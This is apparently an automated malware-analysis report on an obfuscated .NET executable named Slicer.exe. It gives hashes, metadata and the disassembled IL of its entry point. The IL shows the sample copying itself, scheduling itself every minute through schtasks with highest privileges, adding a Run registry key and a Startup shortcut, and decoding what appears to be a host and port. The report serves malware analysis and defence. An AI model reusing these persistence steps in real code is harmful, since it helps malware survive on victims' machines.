527c890f4d698b818458df611bb0f88c

PE Executable
|
MD5: 527c890f4d698b818458df611bb0f88c
|
Size: 71.17 KB
|
application/x-dosexec

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	527c890f4d698b818458df611bb0f88c
Sha1	94c091bf4e4eeb8ddab2e724dd717aebc8be5939
Sha256	9fdac386aee687588045bcafeeedd7d68b5b7e948318f0a85d31821078a9648e
Sha384	764ce7354131c93639ff55a8a1a1b1e10004e661ac9f0f645cfa90cdb4514aa032c866fbfb8596b948bb5b40ecfba8ca
Sha512	8ccba15e3ac2e89013e5be4901e68067101747f3cc14899395b6fcf70495199b0a6b076249dc74f9cf9d26db3485efb59ee22c777f7f50d034e6dbf4f2be87ed
SSDeep	1536:QFxo7NWB7KlbH2S+gQ8VF9bt8XE4KBKw6ppqO440dL:QFWxHlbH7F9btw5+2qO44G
TLSH	D7638D1C77E14A16E4FEABF004F17212C776FA971903D21F24DC51DB2A27A898E52BE1

PeID

.NET executable

Microsoft Visual C# / Basic .NET

Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL

Microsoft Visual C# v7.0 / Basic .NET

Microsoft Visual Studio .NET

File Structure

Informations

Name0	Value
Module Name	Slicer.exe
Full Name	Slicer.exe
EntryPoint	System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::74biDWXE8NcKCh4bwDoNM4yD7Tx4i1dZvwiTMkjaHI4VFMvIjANEnjIbhqc3eEiwzrMiXDFWG2CLyg5Cd32fIeHPXpM()
Scope Name	Slicer.exe
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	Slicer
Assembly Version	1.0.0.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	<null>
Total Strings	425
Main Method	System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::74biDWXE8NcKCh4bwDoNM4yD7Tx4i1dZvwiTMkjaHI4VFMvIjANEnjIbhqc3eEiwzrMiXDFWG2CLyg5Cd32fIeHPXpM()
Main IL Instruction Count	344
Main IL	ldsfld System.Int32 Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::7f9VlPVq9UpuRvRxCztpGTde7TqHCXuldueGgeq8RA3xpMJ4JtisEZ53lG5emXrrHXrGxPUF8Mzi3T6fZua5RFEsGKH ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::HONjflZcSWbFWM0pPSqJKBDdI7sh1UgOuayzwLv6ZoR7mF2nlfdM831psjOAHGIQU7KANVvmbYe4y2g1IQojmQisR1O call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::HONjflZcSWbFWM0pPSqJKBDdI7sh1UgOuayzwLv6ZoR7mF2nlfdM831psjOAHGIQU7KANVvmbYe4y2g1IQojmQisR1O ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::Wzhbvw526YCfEZ8tYNlbIeXIUxxDxSZMGOTLWSAATJwNl2ksLQz22mUIgtFakME01GkKdREg1duf0PUOuDyRUZiZWNU call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::Wzhbvw526YCfEZ8tYNlbIeXIUxxDxSZMGOTLWSAATJwNl2ksLQz22mUIgtFakME01GkKdREg1duf0PUOuDyRUZiZWNU ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::hkdrezDhgQhX5rrrVw2ka8abuGLv1qiJ12EUY9Yp3ywXZib6j5mEm1HH4KSQPsZ1GiiNIlYSDSUc6wi0ASIjn0DWJSR call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::hkdrezDhgQhX5rrrVw2ka8abuGLv1qiJ12EUY9Yp3ywXZib6j5mEm1HH4KSQPsZ1GiiNIlYSDSUc6wi0ASIjn0DWJSR ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::gmHojifPVQqebQBgFmt90cZKeF9l3XtvAwkNFcvY1gy0cGLKEbFQDqWJCMoamjE9808N9VO36Vk3ByCkC3BJyyEgaed call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::gmHojifPVQqebQBgFmt90cZKeF9l3XtvAwkNFcvY1gy0cGLKEbFQDqWJCMoamjE9808N9VO36Vk3ByCkC3BJyyEgaed ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::wS1zfwPUPhMiTNaYQeOkJqIUzlAWPihJAmEoSokV8FdQ8FSjCzjZXsz4Ix16iny8ke1d1vNtp9Rn8zCYmb9agpdPIWy call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::wS1zfwPUPhMiTNaYQeOkJqIUzlAWPihJAmEoSokV8FdQ8FSjCzjZXsz4Ix16iny8ke1d1vNtp9Rn8zCYmb9agpdPIWy ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::ArU2nAq3FwPiD3UH49k49xB0pvWqGmls7nLTW6FLIqlws76KEMY8QoQME6GNx4gE3xUksjY1iZJHdNFhtZo4PDzY7pG call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::ArU2nAq3FwPiD3UH49k49xB0pvWqGmls7nLTW6FLIqlws76KEMY8QoQME6GNx4gE3xUksjY1iZJHdNFhtZo4PDzY7pG ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs call System.Object Stub.9xG9QoeUNqcqIrIPiHOGjFmRVo8jhonLG::dFqgmZVuxop0KwUMhSJbADjkDYGLctnSV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs leave.s IL_00B8: call System.Boolean Stub.DmGT54jflnPb3JH3LWnLg8IHx3quxjyoz::Mx1HZDtf8NIZkCWXj6kc7sx87Qb2Sqv4q() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00B8: call System.Boolean Stub.DmGT54jflnPb3JH3LWnLg8IHx3quxjyoz::Mx1HZDtf8NIZkCWXj6kc7sx87Qb2Sqv4q() call System.Boolean Stub.DmGT54jflnPb3JH3LWnLg8IHx3quxjyoz::Mx1HZDtf8NIZkCWXj6kc7sx87Qb2Sqv4q() brtrue.s IL_00C5: call System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::ckhAgHg7ZpboZ28k38ECJLaGJ25nU5KlPfPOAPa1tlRugrI3EXSvelw32j7LSYt0UTHU456RBiaAdGSfA3HB8dyMZJ4() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::ckhAgHg7ZpboZ28k38ECJLaGJ25nU5KlPfPOAPa1tlRugrI3EXSvelw32j7LSYt0UTHU456RBiaAdGSfA3HB8dyMZJ4() leave.s IL_00DB: call System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::GMlGOTpruXihcNR9H7xQLfXrbMTDati5QPGPwwJC9umhiqUA3UzJRmRv5dYEB6sBztvzQBZCibct0CWSjlc8ded6kwJ() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_5 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00DB: call System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::GMlGOTpruXihcNR9H7xQLfXrbMTDati5QPGPwwJC9umhiqUA3UzJRmRv5dYEB6sBztvzQBZCibct0CWSjlc8ded6kwJ() call System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::GMlGOTpruXihcNR9H7xQLfXrbMTDati5QPGPwwJC9umhiqUA3UzJRmRv5dYEB6sBztvzQBZCibct0CWSjlc8ded6kwJ() ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::ArU2nAq3FwPiD3UH49k49xB0pvWqGmls7nLTW6FLIqlws76KEMY8QoQME6GNx4gE3xUksjY1iZJHdNFhtZo4PDzY7pG ldstr \ ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs call System.String System.String::Concat(System.String,System.String,System.String) stloc.1 <null> ldloc.1 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_6 ldloc.s V_6 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0122: ldloc.1 ldloc.s V_6 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0139: ldc.i4 1000 ldloc.1 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_7 ldloc.s V_7 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.1 <null> ldsfld System.String Stub.DmGT54jflnPb3JH3LWnLg8IHx3quxjyoz::K836Iz2IpzFQ3VJfQCcdB1oiDCQs38iDq call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_0164: ldstr "schtasks.exe" dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0164: ldstr "schtasks.exe" ldstr schtasks.exe newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_10 ldloc.s V_10 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.String Stub.NsPne3WCStWJ4WTbvkhFNgwgfYpa7ATQzUJa6fzHeEc22obkBKX2KmEIh8V8t72KQAI4kvLIPqgPafd9rX0BYkZX15w::E9vHUillQxupiTvNewUoLSq0UGbsQB9NY() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_01CA: ldloc.s V_10 ldloc.s V_10 ldc.i4.5 <null> newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr /create /f /RL HIGHEST /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_15 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) br.s IL_020E: ldloc.s V_10 ldloc.s V_10 ldc.i4.5 <null> newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr /create /f /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_15 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_10 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_9 ldloc.s V_9 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave.s IL_022F: call My.brgI9QdS4DlJlHEENYt5jh2db1sh4fWMxnCWNrTbf585kSDXUqG6ZPQtrcuNn5cI2j77z07MomPR4mJmLxoFPySX4ke My.zgyJSc2EVbeTRHTwgCNT7y5DMbHdcv6Xcndmc2OvLIYzBwnOgOisz0zyfBT41ggUD738oNRFEBewFzh1aZW4OYIC28m::5qCxAblA9CATjJ1CSluejwteLiLkC2NN6ppAXesEwDWkMOJ12DrJJh1sYKB04PHT59NHA1LwlwDb2F0VxPD89ZD4k30() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_022F: call My.brgI9QdS4DlJlHEENYt5jh2db1sh4fWMxnCWNrTbf585kSDXUqG6ZPQtrcuNn5cI2j77z07MomPR4mJmLxoFPySX4ke My.zgyJSc2EVbeTRHTwgCNT7y5DMbHdcv6Xcndmc2OvLIYzBwnOgOisz0zyfBT41ggUD738oNRFEBewFzh1aZW4OYIC28m::5qCxAblA9CATjJ1CSluejwteLiLkC2NN6ppAXesEwDWkMOJ12DrJJh1sYKB04PHT59NHA1LwlwDb2F0VxPD89ZD4k30() call My.brgI9QdS4DlJlHEENYt5jh2db1sh4fWMxnCWNrTbf585kSDXUqG6ZPQtrcuNn5cI2j77z07MomPR4mJmLxoFPySX4ke My.zgyJSc2EVbeTRHTwgCNT7y5DMbHdcv6Xcndmc2OvLIYzBwnOgOisz0zyfBT41ggUD738oNRFEBewFzh1aZW4OYIC28m::5qCxAblA9CATjJ1CSluejwteLiLkC2NN6ppAXesEwDWkMOJ12DrJJh1sYKB04PHT59NHA1LwlwDb2F0VxPD89ZD4k30() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.1 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_026A: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_026A: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::O0K9re7w2LmYGgt1eugyIr1fKyI7ZHTvnb9neflvaSVyEx3YmLUtvHYBKnaJXuzLlikx5NO0pGmDkPdInnxeBKgoLgs call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_13 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldloc.s V_13 stelem.ref <null> ldloc.s V_16 stloc.s V_17 ldloc.s V_17 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_18 ldloc.s V_18 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_18 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_18 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_02EF: stloc.s V_19 ldloc.s V_17 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_13 stloc.s V_19 ldloc.s V_19 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_20 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_19 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_20 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_19 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_19 ldloc.s V_13 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.DmGT54jflnPb3JH3LWnLg8IHx3quxjyoz::RKzoPsXZ95xNymvHpqGHvL9bE4rTX67xQ leave.s IL_036E: call System.Void Stub.6oIsYNH7YLu1mf0Ds8fGzVQwEmZ5vy1pO::yMuKB9zRC7eQeCmUCwSCubToq8LtGTcGu() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_14 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_036E: call System.Void Stub.6oIsYNH7YLu1mf0Ds8fGzVQwEmZ5vy1pO::yMuKB9zRC7eQeCmUCwSCubToq8LtGTcGu() call System.Void Stub.6oIsYNH7YLu1mf0Ds8fGzVQwEmZ5vy1pO::yMuKB9zRC7eQeCmUCwSCubToq8LtGTcGu() ldsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::wS1zfwPUPhMiTNaYQeOkJqIUzlAWPihJAmEoSokV8FdQ8FSjCzjZXsz4Ix16iny8ke1d1vNtp9Rn8zCYmb9agpdPIWy call System.String Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::MIJkicHssbId8zxxWhDY5bMMDBz9E5QzMvo58rzIVszw9P1gtyB6yMaR8feZ8XjY3rznTwgDOLCfBtYEfoQGYC1Escw(System.String) stloc.0 <null> ldloc.0 <null> ldc.i4.1 <null> newarr System.Char stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_21 callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::c7KqcwIjj5ICzlI71DWewMgBj1eGUFDJRYou5cvQmDZyunchfeGqbFNzUbP3t6jlcIcJ99dwF1dJhpZBejDLIJiXx0Z ldloc.0 <null> ldc.i4.1 <null> newarr System.Char stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_21 callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.1 <null> ldelem.ref <null> stsfld System.String Dyg0h6OrRsJVRgScni6t0kvdjo4ct3xozasjNZEE7w9VCaIoPB6HFiTKWYyWzlQjglVkrUYhQ0ocfPH6B2jSVcAq1U6::sOBxiihlzFki1tbWcXT45CxGquqQhR06aDXT7B3tO4sQI0wG8ztWPN0PdRWMziUNgVjakWeaPuzIwdqudnaHxxsw40D call System.Void Stub.DmGT54jflnPb3JH3LWnLg8IHx3quxjyoz::WsXqT6gvOmPThQ1oZb2c5htarIxgWoM8K() ldnull <null> ldftn System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::sdQZvUVCFa8yN7k86LSCNYxT6yLrGPr8IlfcUbfViItdB67jrr6LaOPW3MuKM5o5m4pd2V2YXew9Z6bPKzTqErNCkb5() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.NsPne3WCStWJ4WTbvkhFNgwgfYpa7ATQzUJa6fzHeEc22obkBKX2KmEIh8V8t72KQAI4kvLIPqgPafd9rX0BYkZX15w::E9vHUillQxupiTvNewUoLSq0UGbsQB9NY() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_03E4: ldnull call System.Void Stub.W5qeFpzecLwAmrsbEIEcPD6XuFoISgnD3::3eRo4z0Ev3ppHvZ5zZCVkE1TnVieq6owl() ldnull <null> ldftn System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::5xPHRRcl8TXrwotEBNeqceyzTNhsU8ghNLsprOMVuwrSu0CVdNx2BxK0ZHpjgiezTm8hSY80UFQ8k5a5QzMqgQ5YpUs() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldnull <null> ldftn System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::HQ5erjX77n16I154Wk8nUYigTxdUd0gKLqeTzwvoXMVto4e6ahaY02R8ay2wBLs8v9vXvSLtfsSjV9j2lHXOaHrfSIs() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.3 <null> ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.3 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.3 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
Module Name	Slicer.exe
Full Name	Slicer.exe
EntryPoint	System.Void Stub.DOj64pFp4duQW0IN2VtdiDx0xEGT9904LKm9Di7YJwkiF1yzFvL91rB1olkTnMBz7dMd9ojcAuqqDX7pskqg7EbbzXp::74biDWXE8NcKCh4bwDoNM4yD7Tx4i1dZvwiTMkjaHI4VFMvIjANEnjIbhqc3eEiwzrMiXDFWG2CLyg5Cd32fIeHPXpM()
Scope Name	Slicer.exe
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	Slicer
Assembly Version	1.0.0.0
Assembly Culture	<null>
